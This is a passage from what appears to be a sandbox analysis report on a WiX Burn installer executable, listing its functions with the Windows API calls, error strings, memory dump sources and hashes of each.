                                                                                                                                                          • Instruction Fuzzy Hash: 8F110872A4132077E220A7165C4AF9B691DCB81FA4F11046BBD08FB2D1E6BCDD8082EC
                                                                                                                                                          Function 0047019E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,0041C6C2,00000000,00000001,80000005,00000000,00000000,00000000,00000000), ref: 004701EB
                                                                                                                                                          • SetNamedSecurityInfoW.ADVAPI32(00000000,00000000,80000005,00000001,00000000,0041C6C2,?,00000000,00000000,00000000,00000000,00000000,?,?,0041C6C2,00000000), ref: 00470206
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoNamedSecuritySleep
                                                                                                                                                          • String ID: Failed to copy object to secure.$Failed to set security on object '%ls' after %u retries.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\aclutil.cpp
                                                                                                                                                          • API String ID: 2352087905-3317911174
                                                                                                                                                          • Opcode ID: 3aa0f6fd213d519302eaaa4c6b0a9bb67b15e13fe0dd73f9438f2a965b5c5542
                                                                                                                                                          • Instruction ID: d1a7814a5d6a6a257d74c5af4dcd229c5b810ea33478ee7d8dddcf94cb646245
                                                                                                                                                          • Opcode Fuzzy Hash: 3aa0f6fd213d519302eaaa4c6b0a9bb67b15e13fe0dd73f9438f2a965b5c5542
                                                                                                                                                          • Instruction Fuzzy Hash: 77110833A41229FBDF225E818C49FCF3E29EF45B54F014156FE0876291D2798D60D798
                                                                                                                                                          Function 004656FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,00466067,00423B83,?,?,00000000,00000001), ref: 0046571A
                                                                                                                                                          • GetLastError.KERNEL32(?,00466067,00423B83,?,?,00000000,00000001,?,00409899,00423B83,?,00000000,?,?,00423B83,00000002), ref: 00465726
                                                                                                                                                          • LocalFree.KERNEL32(00000000,00423B83,?,00000002,?,?,00466067,00423B83,?,?,00000000,00000001,?,00409899,00423B83,?), ref: 004657AC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
                                                                                                                                                          • API String ID: 1365068426-740000392
                                                                                                                                                          • Opcode ID: 95438bb767032eb373913d630e8590fd0760776a865a7e9d34190e5ac23bfca9
                                                                                                                                                          • Instruction ID: 4529c9c924ece6e36a27b410a2fc07dee2fa96dfb78d365ed70fcf1d123d2c81
                                                                                                                                                          • Opcode Fuzzy Hash: 95438bb767032eb373913d630e8590fd0760776a865a7e9d34190e5ac23bfca9
                                                                                                                                                          • Instruction Fuzzy Hash: 4A21D532600629FBDB219F809D45FAF3B6DEF54721F11006AFD14A6161E7348D50E6A9
                                                                                                                                                          Function 0040A6A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetComputerNameW.KERNEL32(?,00000010), ref: 0040A6CE
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A6D8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ComputerErrorLastName
                                                                                                                                                          • String ID: Failed to get computer name.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3560734967-4183610518
                                                                                                                                                          • Opcode ID: 90e672cf87e7c6608edbc50c27b201382d720dc38346a22b4c392601aba55c67
                                                                                                                                                          • Instruction ID: 06708cf136fdadc60708c83ef7b3b464170fd286a2578fd3b092d9d84ca13aae
                                                                                                                                                          • Opcode Fuzzy Hash: 90e672cf87e7c6608edbc50c27b201382d720dc38346a22b4c392601aba55c67
                                                                                                                                                          • Instruction Fuzzy Hash: 6B11B432E4122877E320A6548C46FDF77AC9B08B64F91407AFD04BB2C1EA78AD0047E9
                                                                                                                                                          Function 00473063 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473107
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                          • API String ID: 3341692771-772478478
                                                                                                                                                          • Opcode ID: 6eca99ec404650e50dfa6a6b67351209a6140016bc32e3fdff79cb19b0d36ac1
                                                                                                                                                          • Instruction ID: 574c195aa48a5c3056bf343826c70b88b885b9dbd86eeab10a3c7c066eb7048b
                                                                                                                                                          • Opcode Fuzzy Hash: 6eca99ec404650e50dfa6a6b67351209a6140016bc32e3fdff79cb19b0d36ac1
                                                                                                                                                          • Instruction Fuzzy Hash: AB115B72A40325B7D7315D854C46FEF6A1CCB51B66F11802BBB087A285D6BC4E00A3EE
                                                                                                                                                          Function 0046D47D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,004087CC,00000000,00000000,?,?,00000000,00000000), ref: 0046D4AB
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to copy shell folder path: %ls, xrefs: 0046D4E6
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 0046D514
                                                                                                                                                          • Failed to get folder path for CSIDL: %d, xrefs: 0046D4BA
                                                                                                                                                          • Failed to backslash terminate shell folder path: %ls, xrefs: 0046D505
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FolderPath
                                                                                                                                                          • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                          • API String ID: 1514166925-1906042722
                                                                                                                                                          • Opcode ID: 2e736f812fd3851822d9b88d5a0a6c08e8700350310d5eb61fb6302d7eed69c2
                                                                                                                                                          • Instruction ID: 4af6c11ae24b7e3afc7386fa16f8c287abd93e964568cdaefddf0d60aa7785d6
                                                                                                                                                          • Opcode Fuzzy Hash: 2e736f812fd3851822d9b88d5a0a6c08e8700350310d5eb61fb6302d7eed69c2
                                                                                                                                                          • Instruction Fuzzy Hash: 61113DB1F4031877D7206A548C46F6B776CDB05B58F10016BFD05BA2C1F6789D044BA5
                                                                                                                                                          Function 004389D3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,004373B0,00000000,00000000,00000000), ref: 00438A24
                                                                                                                                                          • GetLastError.KERNEL32(?,00414B36,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000), ref: 00438A31
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastThread
                                                                                                                                                          • String ID: Bootstrapper application engine already listening on a pipe.$Failed to create bootstrapper application engine thread.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 1689873465-46964361
                                                                                                                                                          • Opcode ID: 7171344e906e1874294d640f0466a97ea4bd5e68f2b1153c11a91079cde4a7e1
                                                                                                                                                          • Instruction ID: 62b0d50a9faf480f047ee53e6530a8b5804fe7ed001656633e3585f34a656f95
                                                                                                                                                          • Opcode Fuzzy Hash: 7171344e906e1874294d640f0466a97ea4bd5e68f2b1153c11a91079cde4a7e1
                                                                                                                                                          • Instruction Fuzzy Hash: EE110C3268173432D52171565C4AF97AE4C9F46BB5F21403FBE087B2C1DA6CA80186FC
                                                                                                                                                          Function 00470106 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • UuidCreate.RPCRT4(?), ref: 00470129
                                                                                                                                                          • StringFromGUID2.OLE32(?,00000000,00000027), ref: 00470150
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromStringUuid
                                                                                                                                                          • String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
                                                                                                                                                          • API String ID: 4041566446-1001591293
                                                                                                                                                          • Opcode ID: 95304ec9801a92c52182d2af1cabdb87b72fae921d80691ffed27177aec2601f
                                                                                                                                                          • Instruction ID: 6d2e5f8e913ccf942972fdaeccbb16cf9d3eeda69b5bc9404d6d91fbffdf624f
                                                                                                                                                          • Opcode Fuzzy Hash: 95304ec9801a92c52182d2af1cabdb87b72fae921d80691ffed27177aec2601f
                                                                                                                                                          • Instruction Fuzzy Hash: 6F01DB31740208B7D720AAB5CC4AFEF7669DB59715F50003BFA05FB1D1E1688D0486A5
                                                                                                                                                          Function 00470D4D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004017B5: WaitForSingleObject.KERNEL32(?,00439CBA,00000000,?,00439CBA,?,000000FF), ref: 004017C1
                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000,?,004220D3,00000000), ref: 00470D92
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00470D9C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                                          • String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
                                                                                                                                                          • API String ID: 113644094-3739402558
                                                                                                                                                          • Opcode ID: 77b5f221820e74421df7d2d64ba5a4dd6dd8e69faadf8b67ba6da3bf946a85da
                                                                                                                                                          • Instruction ID: c02138e16682ed155c3cd61dff5a4b84735651cb7b118431fc655b3d58b5043a
                                                                                                                                                          • Opcode Fuzzy Hash: 77b5f221820e74421df7d2d64ba5a4dd6dd8e69faadf8b67ba6da3bf946a85da
                                                                                                                                                          • Instruction Fuzzy Hash: 45012B32E81324B3D73129A54C0EFEF2944DB11BA0F058167FD0CBA3D1E2AD5C4082D9
                                                                                                                                                          Function 00422399 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,004097CA,?,?,?,?,?,?,?,?), ref: 004223B6
                                                                                                                                                          • GetLastError.KERNEL32(?,004097CA,?,?,?,?,?,?,?,?), ref: 004223C0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorEventLast
                                                                                                                                                          • String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 3848097054-2646491605
                                                                                                                                                          • Opcode ID: 34c409f72df4aad2feba5b1fb33899d689b1f7b2bc95ecab502322662644b0d8
                                                                                                                                                          • Instruction ID: da412350b23cdd2036ec80d672f2659171a0bb9480160089bb9c7a37defc6a50
                                                                                                                                                          • Opcode Fuzzy Hash: 34c409f72df4aad2feba5b1fb33899d689b1f7b2bc95ecab502322662644b0d8
                                                                                                                                                          • Instruction Fuzzy Hash: 61012632B40A3537D12121595C46F9BA9489B00B74F914237BE08BB2E0B2ECBC5086DD
                                                                                                                                                          Function 004017B5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00439CBA,00000000,?,00439CBA,?,000000FF), ref: 004017C1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                          • String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                          • API String ID: 24740636-253905355
                                                                                                                                                          • Opcode ID: be8a74e25ffdbfe2ad4de4bc7e1299f9976601bdc2fcb6c519a360fae017ef50
                                                                                                                                                          • Instruction ID: db2fafc80f0ae2db882da362e60db3d2213ca837f740fda961f402128fafcabc
                                                                                                                                                          • Opcode Fuzzy Hash: be8a74e25ffdbfe2ad4de4bc7e1299f9976601bdc2fcb6c519a360fae017ef50
                                                                                                                                                          • Instruction Fuzzy Hash: 9901A777A4522877D22121454C45FA7691D9B457B0F96C07BFD0CFB2E2963D8C0152ED
                                                                                                                                                          Function 00459ABE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,83C6D434,?,?,00000000,00476EFF,000000FF,?,00459A9A,00459B7E,?,00459A6E,00000000), ref: 00459AF3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00459B05
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00476EFF,000000FF,?,00459A9A,00459B7E,?,00459A6E,00000000), ref: 00459B27
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                          • Opcode ID: 7190d2d2ebecd383be5ddc9813ab014f9718af53060f3d2bb5944e19a03ad636
                                                                                                                                                          • Instruction ID: 2c8aa5cf8c816d909afbb39d79f127b4dee9f7c2bacbd688ba7e27945d44568b
                                                                                                                                                          • Opcode Fuzzy Hash: 7190d2d2ebecd383be5ddc9813ab014f9718af53060f3d2bb5944e19a03ad636
                                                                                                                                                          • Instruction Fuzzy Hash: 6401A231A08619EFDB119F44DC05FEEBBB9FB04B11F440236F811A26E1DB799844CA98
                                                                                                                                                          Function 0046CA04 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 82COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                          • API String ID: 1617791916-2152106040
                                                                                                                                                          • Opcode ID: 29128b94b015edc55ec88c1c0c42853ec8869e0002c95aecf9c12b2b48e405fb
                                                                                                                                                          • Instruction ID: 410ebc8ff978e23cf562ec8a9c6ab99e66892f5fa8bc397a58aac6db8ddeff18
                                                                                                                                                          • Opcode Fuzzy Hash: 29128b94b015edc55ec88c1c0c42853ec8869e0002c95aecf9c12b2b48e405fb
                                                                                                                                                          • Instruction Fuzzy Hash: 0221B6B1A443147BD7249F5A8CC5F677A98DB99760F10417FFD48AF382E2B88C0086A9
                                                                                                                                                          Function 0040C13E Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040C14A
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0040C1D2
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C1C2
                                                                                                                                                          • Failed to get value of variable: %ls, xrefs: 0040C184
                                                                                                                                                          • Failed to get value as version for variable: %ls, xrefs: 0040C1B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
